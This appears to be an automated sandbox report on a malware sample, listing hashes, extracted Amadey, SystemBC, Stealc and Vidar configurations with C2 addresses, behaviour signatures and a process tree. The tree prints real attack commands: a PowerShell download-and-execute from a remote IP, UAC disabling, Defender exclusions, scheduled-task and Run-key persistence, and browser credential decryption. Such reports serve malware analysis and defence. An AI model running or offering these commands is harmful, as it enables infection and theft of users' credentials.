Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 16:10

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    76d04be1cdeeace530e6266b8ede7380

  • SHA1

    bdb334d85eea027c9b5c0442027497ea03cf3f85

  • SHA256

    ddda70cdab79b119b205e60921ba6048887312cdd47741f9259fc4bc0c83a18a

  • SHA512

    e6605a7f104aef95df3b2be7fd54302e8d9799e6fc967816cb63d144f89cabc0504d0f175a58f0e0b977a7a7551e60d1f518259b8b5a9203eafedf66cd8153fe

  • SSDEEP

    24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8ay4F:STvC/MTQYxsWR7ay4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • UAC bypass 3 TTPs 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Detects GOST tunneling tool 1 IoCs

    A simple tunneling tool written in Golang

  • Downloads MZ/PE file 28 IoCs
  • Uses browser remote debugging 2 TTPs 13 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 11 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 17 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn xbkwfmacM0W /tr "mshta C:\Users\Admin\AppData\Local\Temp\vGn4DKnt6.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn xbkwfmacM0W /tr "mshta C:\Users\Admin\AppData\Local\Temp\vGn4DKnt6.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1304
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\vGn4DKnt6.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YXS8SHZMOTWVBNFB3BUSXEQAPTV944NZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3556
        • C:\Users\Admin\AppData\Local\TempYXS8SHZMOTWVBNFB3BUSXEQAPTV944NZ.EXE
          "C:\Users\Admin\AppData\Local\TempYXS8SHZMOTWVBNFB3BUSXEQAPTV944NZ.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4624
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4296
            • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe
              "C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4692
            • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
              "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4916
            • C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
              "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
              6⤵
              • Executes dropped EXE
              PID:2020
            • C:\Users\Admin\AppData\Local\Temp\1087223001\Installer.exe
              "C:\Users\Admin\AppData\Local\Temp\1087223001\Installer.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1200
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\QrZqoYPrws.ps1""
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3016
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\QrZqoYPrws.ps1"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2824
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15221gzh\15221gzh.cmdline"
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4664
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0B9.tmp" "c:\Users\Admin\AppData\Local\Temp\15221gzh\CSC9503672683CD4D0D9478BFD6134B37B4.TMP"
                      10⤵
                        PID:4240
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:400
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4388
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2496
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1680
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,222,48,86,232,133,154,237,69,159,255,252,134,164,181,166,246,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,91,32,18,79,143,212,4,87,197,171,61,233,98,179,209,100,21,195,173,161,187,187,228,108,22,14,211,192,163,223,8,14,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,131,132,163,113,74,160,255,156,157,75,99,51,203,240,125,233,195,100,37,82,38,93,147,237,87,179,170,14,219,252,73,48,0,0,0,168,90,194,122,125,180,148,173,189,12,123,176,190,187,239,27,21,110,205,200,155,24,165,26,26,234,129,151,189,66,71,199,122,133,132,216,64,188,204,28,18,242,160,240,69,245,244,130,64,0,0,0,253,96,240,159,63,29,69,36,183,105,60,44,36,19,160,186,78,89,134,176,157,173,23,158,4,124,243,6,39,125,230,207,144,45,148,126,239,211,171,173,172,122,42,207,2,53,241,24,169,201,71,160,75,157,216,225,25,215,201,101,55,253,19,95), $null, 'CurrentUser')"
                  7⤵
                  • An obfuscated cmd.exe command-line is typically used to evade detection.
                  • Suspicious use of WriteProcessMemory
                  PID:1408
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,222,48,86,232,133,154,237,69,159,255,252,134,164,181,166,246,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,91,32,18,79,143,212,4,87,197,171,61,233,98,179,209,100,21,195,173,161,187,187,228,108,22,14,211,192,163,223,8,14,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,131,132,163,113,74,160,255,156,157,75,99,51,203,240,125,233,195,100,37,82,38,93,147,237,87,179,170,14,219,252,73,48,0,0,0,168,90,194,122,125,180,148,173,189,12,123,176,190,187,239,27,21,110,205,200,155,24,165,26,26,234,129,151,189,66,71,199,122,133,132,216,64,188,204,28,18,242,160,240,69,245,244,130,64,0,0,0,253,96,240,159,63,29,69,36,183,105,60,44,36,19,160,186,78,89,134,176,157,173,23,158,4,124,243,6,39,125,230,207,144,45,148,126,239,211,171,173,172,122,42,207,2,53,241,24,169,201,71,160,75,157,216,225,25,215,201,101,55,253,19,95), $null, 'CurrentUser')
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2908
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,222,48,86,232,133,154,237,69,159,255,252,134,164,181,166,246,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,74,204,193,126,185,161,108,243,192,145,180,53,58,25,222,56,82,244,189,161,25,127,16,221,37,53,194,84,6,161,178,170,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,241,14,146,61,3,44,125,212,233,56,38,214,91,166,43,158,127,116,3,40,27,65,183,36,158,123,148,71,210,199,201,25,48,0,0,0,167,241,174,43,102,28,211,95,169,240,185,76,25,17,185,103,78,40,43,130,203,113,230,225,120,136,223,134,188,36,233,251,184,59,56,79,103,132,176,15,160,29,198,51,45,0,50,189,64,0,0,0,149,50,166,232,72,38,1,226,56,236,210,106,15,21,88,114,125,213,171,117,144,95,16,148,245,75,13,121,36,227,229,118,32,59,5,6,34,11,254,7,120,74,100,212,248,17,185,10,67,61,194,179,185,247,73,101,187,60,107,68,37,198,41,90), $null, 'CurrentUser')"
                  7⤵
                  • An obfuscated cmd.exe command-line is typically used to evade detection.
                  • Suspicious use of WriteProcessMemory
                  PID:3572
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,222,48,86,232,133,154,237,69,159,255,252,134,164,181,166,246,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,74,204,193,126,185,161,108,243,192,145,180,53,58,25,222,56,82,244,189,161,25,127,16,221,37,53,194,84,6,161,178,170,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,241,14,146,61,3,44,125,212,233,56,38,214,91,166,43,158,127,116,3,40,27,65,183,36,158,123,148,71,210,199,201,25,48,0,0,0,167,241,174,43,102,28,211,95,169,240,185,76,25,17,185,103,78,40,43,130,203,113,230,225,120,136,223,134,188,36,233,251,184,59,56,79,103,132,176,15,160,29,198,51,45,0,50,189,64,0,0,0,149,50,166,232,72,38,1,226,56,236,210,106,15,21,88,114,125,213,171,117,144,95,16,148,245,75,13,121,36,227,229,118,32,59,5,6,34,11,254,7,120,74,100,212,248,17,185,10,67,61,194,179,185,247,73,101,187,60,107,68,37,198,41,90), $null, 'CurrentUser')
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3700
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4208
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                    8⤵
                    • UAC bypass
                    PID:1556
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
                  7⤵
                    PID:3592
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic diskdrive get serialnumber
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1552
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Installer /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
                    7⤵
                      PID:2520
                      • C:\Windows\system32\reg.exe
                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Installer /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
                        8⤵
                        • Adds Run key to start application
                        PID:1896
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.soE2QP34ls""
                      7⤵
                        PID:3988
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.soE2QP34ls"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2540
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
                        7⤵
                          PID:908
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4192
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
                          7⤵
                            PID:3516
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic baseboard get serialnumber
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4884
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
                            7⤵
                              PID:4696
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                              7⤵
                                PID:4988
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_computersystemproduct get uuid
                                  8⤵
                                    PID:4448
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
                                  7⤵
                                    PID:4876
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic PATH Win32_VideoController GET Description,PNPDeviceID
                                      8⤵
                                        PID:264
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
                                      7⤵
                                        PID:4712
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic memorychip get serialnumber
                                          8⤵
                                            PID:1408
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                                          7⤵
                                            PID:2968
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              8⤵
                                                PID:2908
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
                                              7⤵
                                                PID:2344
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic cpu get processorid
                                                  8⤵
                                                    PID:2368
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
                                                  7⤵
                                                    PID:4816
                                                    • C:\Windows\system32\getmac.exe
                                                      getmac /NH
                                                      8⤵
                                                        PID:2916
                                                    • C:\Users\Admin\AppData\Local\Temp\python-installer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2284
                                                      • C:\Windows\Temp\{F9149E55-7DFE-4F2A-BC8D-564354E48CBA}\.cr\python-installer.exe
                                                        "C:\Windows\Temp\{F9149E55-7DFE-4F2A-BC8D-564354E48CBA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=536 -burn.filehandle.self=544 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry class
                                                        PID:4240
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
                                                      7⤵
                                                        PID:1944
                                                    • C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5040
                                                      • C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4548
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 788
                                                        7⤵
                                                        • Program crash
                                                        PID:4120
                                                    • C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4136
                                                      • C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2516
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 788
                                                        7⤵
                                                        • Program crash
                                                        PID:3208
                                                    • C:\Users\Admin\AppData\Local\Temp\1087492001\ZyE7LLF.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087492001\ZyE7LLF.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1896
                                                      • C:\Users\Admin\AppData\Local\Temp\1087492001\ZyE7LLF.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1087492001\ZyE7LLF.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4216
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 804
                                                        7⤵
                                                        • Program crash
                                                        PID:3572
                                                    • C:\Users\Admin\AppData\Local\Temp\1087578001\a506756518.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087578001\a506756518.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2904
                                                    • C:\Users\Admin\AppData\Local\Temp\1087595001\223531d575.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087595001\223531d575.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:388
                                                    • C:\Users\Admin\AppData\Local\Temp\1087596001\ba360347d2.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1087596001\ba360347d2.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Downloads MZ/PE file
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Loads dropped DLL
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1144
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        • Enumerates system info in registry
                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:3980
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcf6fecc40,0x7ffcf6fecc4c,0x7ffcf6fecc58
                                                          8⤵
                                                            PID:1948
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1900 /prefetch:2
                                                            8⤵
                                                              PID:4448
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
